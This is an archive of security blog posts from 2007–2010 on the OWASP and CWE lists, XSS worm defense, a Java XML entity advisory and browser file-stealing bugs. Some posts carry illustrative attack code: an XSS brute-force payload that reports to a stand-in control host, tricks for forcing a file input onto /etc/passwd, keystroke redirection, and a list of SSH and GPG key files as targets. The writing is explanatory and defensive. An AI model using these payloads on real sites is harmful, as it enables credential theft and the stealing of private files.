OWASP Top Ten for 2010 Released

The OWASP Top Ten Project has released a final version of the Top Ten for 2010.

In this new version, the focus has shifted to become more risk oriented. There is less emphasis on "vulnerabilities" and a greater focus on identifying meaningful risk. Risk is identified using a methodology that explicitly calls out threat agents, attack vectors, weakness prevalence, technical impact, and business impact.

For 2010, the OWASP Top 10 Web Application Security Risks are:

  • A1: Injection
  • A2: Cross-Site Scripting (XSS)
  • A3: Broken Authentication and Session Management
  • A4: Insecure Direct Object References
  • A5: Cross-Site Request Forgery (CSRF)
  • A6: Security Misconfiguration
  • A7: Insecure Cryptographic Storage
  • A8: Failure to Restrict URL Access
  • A9: Insufficient Transport Layer Protection
  • A10: Unvalidated Redirects and Forwards

The final document is available from the OWASP Top Ten Project site.

Personally, I'm glad to see the return of a misconfiguration category (A6: Security Misconfiguration). This is a reprise of the old Insecure Configuration Management from the 2004 version. The failure to provide secure configurations is a more frequent problem than many people like to admit.

Posted by gfleischer on 2010/04/19 at 19:47 in Security

Top 25 Most Dangerous and Getting 'Threat Model' Terminology Correct

Today, the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors list was released. These top twenty-five CWE entries represent the most important vulnerability categories that all application developers should be aware of. Think of it as an OWASP Top Ten that covers more than just web applications. The existing Common Weakness Enumeration is outstanding but overwhelming. By framing the programming errors in terms of a Top 25, these issues become instantly more accessible. In turn, this establishes a de facto application security baseline.

What I found most refreshing was the proper use of the term 'Threat Model' in Appendix B: Threat Model for the Skilled, Determined Attacker. Too often the term has been abused by some people to label activities better described as vulnerability analysis or attack modeling. The proper focus of a threat model is the agent or actor that could exploit a vulnerability. It was extremely satisfying to see the threat model explicitly described when it is so often glossed over or ignored completely.

Posted by gfleischer on 2009/01/12 at 22:13 in Security

Cross-Site XHR Removed from Firefox 3

According to this Bugzilla entry, Bug 424923 - Remove Cross-Site XHR, the Cross-Site XMLHttpRequest (XHR) support has been removed from Mozilla Firefox 3. Mike Shaver made brief mention of this in his latest blog post.

I think this is good news overall. It just didn't seem that the whole concept of cross-site XHR was fully baked. Given the prevalence of cross-domain web attacks, waiting for the specification to settle is probably an excellent idea.

Posted by gfleischer on 2008/03/27 at 20:53 in Security

Mozilla Firefox 2.0.0.13 Released

Mozilla Firefox 2.0.0.13 has been released. See the release notes for more information.

There are security fixes for a couple of vulnerabilities that I was involved with.

I'll be posting some more information about these in the future.

Posted by gfleischer on 2008/03/25 at 22:19 in Security

An Architectural Approach to XSS Worm Defense

I've been wanting to post a follow-up to RSnake's XSS Worm Analysis And Defense paper, but I was waiting to see if anything else came of it. As I mentioned before, post-contest commentary has been extremely light. I find this very disheartening. The whole reason for the contest was to generate interest in creating XSS worms in order to better understand what effective anti-worm countermeasures could be developed. RSnake made this perfectly clear: "the goal here is to understand why the propagation methods were chosen so we can build defenses against them." Unfortunately, it appears the sensationalism of the contest overshadowed the ultimate goals.

But that doesn't mean there wasn't important progress made in understanding both how XSS worms could propagate and what can be done to prevent them. I posted the following comment as an attempt to draw together all of the ideas in the paper:

So, let me see if I am understanding how this all ties together:
  • The website www.example.com is a social network site where users must log in to post content.
  • The www.example.com site has potential XSS vulnerabilities on every page.
  • There are two types of users that utilize the site: those with JavaScript enabled and those with JavaScript disabled. The users don't toggle JavaScript on and off as they use the site. Going from on to off, the site will not function; going from off to on, the user may be vulnerable to XSS attacks.
  • When a user first logs into www.example.com, the JavaScript status is detected (e.g., onsubmit form handler sets hidden form variable). The JavaScript status is associated with the user session.
  • A separate domain confirm.example.com is used to prompt users for confirmation of submitted content.
  • The confirm.example.com website is guaranteed to be free of XSS holes.
  • Any content submitted on www.example.com is posted directly to a confirmation page on confirm.example.com.
  • There is not a nonce used on www.example.com, because an XMLHttpRequest could read it if it was present and replay it.
  • Confirmation of content on confirm.example.com is only allowed via the POST method.
  • A nonce is used on POSTs from confirm.example.com to prevent blind CSRF attacks.
  • If the confirmation page detects that it has been framed, it should attempt to unframe itself. If this fails, submission of the form should not be allowed. If JavaScript is not enabled, or if on IE security="restricted" was set on the frame, this check will never run, so additional logic must compensate for it.
  • If user did not have JavaScript enabled when the user session was established, the form is constructed so that no JavaScript is required to submit it. If JavaScript is enabled, the form should not be submitted; this protects against the situation where the user started with JavaScript off and then turned it on, thus making himself vulnerable to attacks.
  • If the user had JavaScript enabled when the session was established, the confirm page should be constructed so that it only allows for submission when JavaScript is enabled (e.g., set method and action in onsubmit handler). This protects against the IE situation where "security=restricted" has been set on a frame. If JavaScript is no longer enabled, submission will fail.

The big caveat to all of this would be that the login process needs to be protected in a similar manner (e.g., use separate login.example.com domain, etc.).
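
To make the moving parts concrete, here is a minimal sketch of the two pages for a user whose session was established with JavaScript enabled. All of the names (the js flag, armAndSubmit, the /confirm/submit path) are hypothetical illustrations of the scheme above, not code from RSnake's paper:

    <!-- www.example.com login form: an onsubmit handler flips a hidden
         flag, so the server learns whether JavaScript is enabled. -->
    <form action="/login" method="post"
          onsubmit="this.elements['js'].value = 'on'; return true;">
        <input type="hidden" name="js" value="off">
        <input type="text" name="username">
        <input type="password" name="password">
        <input type="submit" value="Log in">
    </form>

    <!-- confirm.example.com confirmation page: the form has no usable
         method or action until script arms it, so it fails closed when
         JavaScript is off (including IE frames loaded with
         security="restricted"). -->
    <form action="#" onsubmit="return armAndSubmit(this);">
        <input type="hidden" name="nonce" value="...one-time value...">
        <input type="submit" value="Confirm post">
    </form>
    <script>
        // Anti-framing: try to unframe; the arming check below refuses
        // to submit if the page is still framed afterwards.
        if (top != self) {
            try { top.location = self.location; } catch (e) { }
        }
        function armAndSubmit(form) {
            if (top != self) { return false; }  // still framed: refuse
            form.method = "post";
            form.action = "/confirm/submit";
            return true;
        }
    </script>

With JavaScript disabled, the confirmation form degrades to a GET of "#", which the server rejects because confirmation is only accepted via POST.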

Given some of the confusion, maybe RSnake's explanation in the paper wasn't clear enough for general consumption. For anyone who is involved with these types of issues, the paper presents a fresh take on many of the existing defensive techniques.

The approach can be condensed into the following main points:

  • use the same-origin policy as a choke-point
  • be smart about nonces
  • anti-framing should be JavaScript aware

The key insight is that by using a separate domain strictly dedicated to confirmation of user-submitted content, many of the XSS worm propagation techniques can be stymied. Any use of XMLHttpRequest to propagate the worm will be prevented when a separate domain is used (the Samy worm was able to propagate because it could switch domains). This leaves only blind CSRF attacks as a concern.

If that single domain can be guaranteed to be free of XSS holes, then a nonce can be used to prevent blind CSRF. But that nonce must be properly employed. If the nonce is available anywhere that can be read using JavaScript, then it could be replayed as part of the attack.
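
To see why, consider what worm code already running on the vulnerable www.example.com domain could do if the nonce appeared anywhere in that domain's markup. The page path and field name here are hypothetical:

    <script>
        // Worm code on www.example.com: fetch a same-origin page, scrape
        // the nonce out of the HTML, and replay it in a forged request.
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "/post-comment", false);  // synchronous, same origin
        xhr.send(null);
        var match = /name="nonce"\s+value="([^"]+)"/.exec(xhr.responseText);
        if (match) {
            var stolenNonce = match[1];  // the nonce is now worthless
        }
    </script>

Keeping the nonce confined to pages served from confirm.example.com puts it beyond the reach of any script running on the vulnerable domain.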

Finally, anti-framing approaches should be considered carefully. Because some users may not have JavaScript enabled (for accessibility reasons), a thoughtful approach is required to avoid causing those users excessive hardship. Internet Explorer can be forced to disable JavaScript in frames through the use of a restricted security policy. By analyzing the possible scenarios, appropriate application logic can be constructed that prevents these types of attacks while still making the website usable.

Of course, all of this depends on browsers being free of vulnerabilities. If web browsers can be induced to violate the same-origin policy, many of these defenses begin to break down. In these cases, additional techniques are required to identify and stop XSS worms; this is still an area with open research questions.

But as RSnake shows in his paper, some simple architectural design decisions can be used to help prevent XSS worms from ever taking hold.

Posted by gfleischer on 2008/02/04 at 22:02 in Security

XML Vulnerability in SUN Java Runtime Environment

A couple of days ago, I noted the latest Sun Java Runtime Environment (JRE) update and the apparent lack of security advisories. Today, I saw that one was in fact released shortly after I posted about it.

The following advisory, A Vulnerability in the Java Runtime Environment XML Parsing Code May Allow URL Resources to be Accessed, was posted; it describes a defect that allowed "external general entities" to be processed even when that processing had been disabled:

The Java Runtime Environment (JRE) by default allows external entity references to be processed. To turn off processing of external entity references, sites can set the "external general entities" property to FALSE. This property is provided since it may be possible to leverage the processing of external entity references to access certain URL resources (such as some files and web pages) or create a Denial of Service (DoS) condition on the system running the JRE. A defect in the JRE allows external entity references to be processed even when the "external general entities" property is set to FALSE.

The issue of external entity handling is mostly a concern when accepting and parsing XML documents from untrusted sources. But given the prevalence of web services that rely on the exchange of XML documents, this is probably a common situation. Anyone who was depending on the feature being turned off is potentially at risk.

NOTE: By default, processing of external entities is turned ON.

The advisory states that processing can be disabled by setting the following feature to false (shown here on a JAXP SAXParserFactory):

    SAXParserFactory factory = SAXParserFactory.newInstance();
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);

You can search for other disclosed JRE vulnerabilities on the Sun sites using the search: "Vulnerability Java Runtime Environment".

Posted by gfleischer on 2008/02/01 at 11:24 in Security

Disclosure Truly is Dead

According to this eWeek article, Caught in a (Real) Security Bind, RealNetworks is unable to get information on the RealPlayer 11 vulnerability currently being offered by Gleg as part of their VulnDisco pack.

In a quote attributed to Chad Dougherty of Carnegie Mellon's CERT/CC:

We'd like to see the issue get fixed. We don't get into the politics of disclosure. Our objective is to get the information flowing in a way that end users are protected.

The sense of futility reminded me of Jeremiah Grossman's article Businesses must realize that full disclosure is dead. In it, he makes the following spot-on observation:

While ethics, morals, and professionalism should always be fundamental tenants of how professionals conduct themselves, it's irresponsible to design security strategies based on the assumption people will be. Business owners and software vendors have a responsibility for the data they protect and the products they sell. They must take into consideration the environment around them, understand that it's hostile, and be pragmatic in their approach. Have no expectation that anyone is going to share any vulnerability information ahead of time. Pray they will before going public, but do not depend on it and frankly, it's hopeless to demand it.

Vendors need to recognize that conducting proactive vulnerability research into their own products must be an integral part of the software development lifecycle. Find the vulnerabilities before someone else does. That has become the only way to stay ahead.

Posted by gfleischer on 2008/01/31 at 20:07 in Security

Jeff Jones, Manufactured Controversy, and Yes, the SDL Works

Jeff Jones has recently released a new paper comparing vulnerability counts for Windows Vista in its first year with the equivalent time frame for Windows XP. The result is that Vista had fewer vulnerabilities in its first year than Windows XP did. Somehow that is not surprising, given that XP was released prior to the implementation of the Security Development Lifecycle (SDL).

In fact, if the vulnerability counts in Vista weren't significantly lower, the SDL would have been declared an abysmal failure and the Microsoft security employees would have slunk off meekly into the night. But this didn't happen, and that is a good thing. It lends credence to the idea that well-structured security engineering and development processes work in reducing the total number of vulnerabilities.

Of course, after Jones' previous stinker of a paper (which I discussed here), there was bound to be controversy. You can watch the piling on in the usual places (ZDNet or Slashdot). There are the usual arguments about counts, methodologies and rhyming apple with orange. Trolling and flamebait at its finest. Fanbois and zealots arise.

But all of this serves to cloud the real issue. The comparisons between Windows, the Linux distributions and Mac OS X aren't getting to the core of the problem. They are simply a distraction. Most people don't stand around pondering which operating system to buy based on which might be more secure. The choice of operating system has already been made for them. For most people, it is going to be some OEM version of Windows.

So maybe a more appropriate question to pose is: if one has to purchase a computer to run Windows, should it be Windows XP SP2 or Vista? That is where the Jones paper fails to reach its full potential. Comparing an outdated, unsupported Windows XP release with Vista, and at the same time comparing Vista with Linux and Mac OS X, just confuses the issue of assigning some sort of "best security" mantle.

There is significant value to be found in Jones' paper if it is read dispassionately. He has promised a more interesting work that includes the Days-of-Risk (DoR) metric for the products. Personally, I am looking forward to it, because it should help clarify how much exposure an individual user had to a given vulnerability. Unfixed vulnerabilities (not undiscovered vulnerabilities) are the basis for most risk faced by users.

I hope the DoR metrics are enlightening, because a careful reading of the side-by-side comparisons showed that Ubuntu LTS (reduced) had the fewest unfixed vulnerabilities in the first year. I find that an intriguing discrepancy alongside the paper's other conclusions about Windows Vista's security superiority.

Posted by gfleischer on 2008/01/24 at 13:50 in Security

XSS Vulnerabilities Can Be Used to Hack Servers

Recently there has been some controversy surrounding ScanAlert's HackerSafe program with respect to its position on sites with XSS (cross-site scripting). This Information Week article gives the background. Essentially, ScanAlert believes that XSS vulnerabilities are only a threat to clients and/or their web browser.

In the article, the following statement is made:

Pierini maintains that XSS vulnerabilities aren't material to a site's certification. "Cross-site scripting can't be used to hack a server," he said. "You may be able to do other things with it. You may be able to do things that affect the end-user or the client. But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly."

Claiming that XSS can't be used to hack a server is just a semantic distinction. Of course, ScanAlert has to take that position; otherwise, they would appear to be selling snake-oil site protection. I'm not passing any judgement on ScanAlert's mindset, but I would like to point out that XSS can be used to hack servers.

Any browser-based attack that an attacker could launch directly could be re-packaged as an XSS payload. Here are a few possible examples of using XSS to attack a server:

  • Brute-force login credentials
  • Server port-scanning
  • Data retrieval through SQL injection (SQLI)

When a user visits the site, the XSS payload is launched and runs in the context of the original site. Because the payload runs in that context, the same-origin policy allows it to connect back to the site, communicate with it via XMLHttpRequest, and potentially establish Java network sockets using LiveConnect. Clearly, these are all attacks against the server.

An attacker could remain extremely stealthy while conducting reconnaissance or attacking the server. By using many individual client web browsers as attack agents, the attacker never needs to connect to the site directly. With the addition of a third-party command and control site to coordinate across many clients, a user's web browser could be used to scan a single port on the server, attempt to login with a few user-names or passwords, or retrieve a single row from the database using SQLI.
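
As a rough illustration, the brute-force case might look something like the following. The login path, parameter names, credential slice, and control host are all hypothetical, and a real payload would also inspect the response body to tell success from failure:

    <script>
        // Hypothetical XSS payload: each infected browser tries a small
        // slice of a credential list against the site's own login handler.
        var guesses = [["admin", "admin"], ["admin", "letmein"]];
        for (var i = 0; i < guesses.length; i++) {
            var xhr = new XMLHttpRequest();
            // Same origin: the victim's browser talks to the site it is on.
            xhr.open("POST", "/login", true);
            xhr.setRequestHeader("Content-Type",
                                 "application/x-www-form-urlencoded");
            xhr.onreadystatechange = (function (user) {
                return function () {
                    if (this.readyState == 4 && this.status == 200) {
                        // Report the attempt to the third-party control site.
                        new Image().src = "http://c2.example.net/hit?u="
                                          + encodeURIComponent(user);
                    }
                };
            })(guesses[i][0]);
            xhr.send("user=" + encodeURIComponent(guesses[i][0])
                     + "&pass=" + encodeURIComponent(guesses[i][1]));
        }
    </script>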

The reconnaissance or attack may go completely unnoticed because, by distributing the activity across a large number of clients, it has been spread out both in time and space. It would appear as a bunch of little, organic attacks, not as one big, coordinated attack. Heuristic-based IDS, IPS or DLP protections may never fire if the attack is subtle enough.

These aren't new ideas (see "10 Quick Facts..." in this paper). Really, these are the same old XSS attacks against LAN clients, but targeting the originating server instead. Just something to keep in mind when someone claims XSS can't be used to hack a server.

And for more excellent commentary see Jeremiah Grossman's comments as well as Jericho's (from attrition.org).

Posted by gfleischer on 2008/01/21 at 22:39 in Security

Web Browser File Stealing Vulnerabilities Are Important

File stealing vulnerabilities have long held a special place in web browser exploitation. Web browsers attempt to carefully sandbox content to avoid interaction with the local file-system. But INPUT elements with TYPE=FILE are specifically designed to bypass the sandbox to allow users to select files for upload. For miscreants, this provides the opportunity to steal files from unsuspecting users. By exploiting web browser vulnerabilities, malicious web pages may be able to steal confidential information by manipulating the FILE input element and causing arbitrary files to be uploaded. These types of attacks are old and well known.

There are a few main modes of attack.

  • Purely technical attacks: The purely technical attack involves exploiting a vulnerability to directly set the file input's VALUE field to a chosen, arbitrary value. For example, create an input element of type TEXT, set the value, and then change the type to FILE:
    <script>
        // Start as a text input so the value can be set from script.
        var input0 = document.createElement("input");
        input0.type = "text";
        input0.value = "/etc/passwd";
        // Flip the type to "file"; in a vulnerable browser, the
        // preloaded path survives as the file to be uploaded.
        input0.type = "file";
    </script>
    
    Other attacks have involved direct DOM manipulations. These types of vulnerabilities are now extremely rare, because the file input types enjoy additional protections in most modern web browsers.
  • Social engineering attacks: The social engineering attack usually involves getting the user to type the complete path to the file into the input element. To increase the chance of success, Cascading Style Sheets (CSS) are used to style the input to appear more like a text element or textarea, or to overlay it with some other element.
  • Hybrid attacks: The hybrid attack combines aspects of the technical attack with elements of the social engineering attack. These attacks are typically performed by selectively capturing keystrokes and delivering them into the file input's text entry field. There have been a couple of methods used to facilitate this type of attack. The first involves silently redirecting keystrokes from another input element into the file input. The second method sets the focus on the file input element and simulates keystrokes into another input element. In both methods, CSS can be used to obscure the fact that the user's data is being sent to the file input element. (A sketch of the first method follows this list.)
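
A stripped-down sketch of the first method might look like the following. The element names and CSS are hypothetical, and the character echo is only approximate; this is an illustration of the technique, not a working exploit for any particular browser:

    <!-- The visible field the victim believes they are typing into. -->
    <input id="decoy" type="text">
    <!-- The file input, pushed off-screen with CSS. -->
    <input id="target" type="file" style="position: absolute; left: -1000px;">
    <script>
        var decoy = document.getElementById("decoy");
        var target = document.getElementById("target");
        // As each key goes down in the decoy, move focus so that the
        // character is delivered into the file input's text box instead.
        decoy.onkeydown = function () {
            target.focus();
        };
        // After the key lands, echo a rough approximation into the decoy
        // and hand focus back so the victim sees what they expect.
        target.onkeyup = function (e) {
            e = e || window.event;
            decoy.value += String.fromCharCode(e.keyCode).toLowerCase();
            decoy.focus();
        };
    </script>

This is exactly the class of focus manipulation that the browser fixes discussed below are meant to shut down.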

Depending on the attacker's goals, well-known files may be targeted. For example, on Linux or Mac OS X, some security-related files are juicy targets:

  • ~/.gnupg/secring.gpg
  • ~/.ssh/id_rsa

Or, maybe one of the history files:

  • ~/.bash_history
  • ~/.lesshst
  • ~/.mysql_history
  • ~/.scapy_history
  • ~/.viminfo

Even simple files like "C:\boot.ini", "/etc/passwd" or "/etc/hosts" can show information about the system that the owner may not want revealed. For example, acquiring one or more of these files from a Tor user could be used to fingerprint the machine or reveal the user's actual identity.

The way that people use their web browsers with the Internet has changed over the last several years. The level of web browser interaction has drastically increased. Normal people are writing blog entries, posting comments on their friends' sites and composing business documents using online services. This is a huge shift from the "punch the monkey" mouse clicking of the early years. That increased level of interaction is what makes the hybrid attacks so significant. Users are accustomed to typing into web forms and responding to captchas. Vulnerabilities that allow redirecting the focus to the file input field should be taken seriously.

File stealing through manipulation of the file input can be extremely insidious. Users truly depend on their web browser to protect them. So, among the major browsers, what can users expect?

Mozilla's efforts with Firefox are finally beginning to pay off. Firefox 3 completely removes the text entry portion of the file input and replaces it with a graphical file picker. The last several Firefox 2 releases have been incrementally addressing the ability to selectively set the focus on the text portion of the file input element.

Safari has used a file picker for a long time and avoided the whole focus and captured keystroke problem.

Microsoft Internet Explorer has lagged behind in these fixes. It isn't entirely clear what changes IE8 will bring, but both IE6 and IE7 continue to exhibit some of the classic focus vulnerabilities. These vulnerabilities have been publicly disclosed repeatedly over the last couple of years, yet IE has not been updated to address any of them.

To close out the year, I'll post some demonstrations of how these IE file stealing vulnerabilities can be exploited. Stay tuned.

Posted by gfleischer on 2007/12/20 at 21:33 in Security

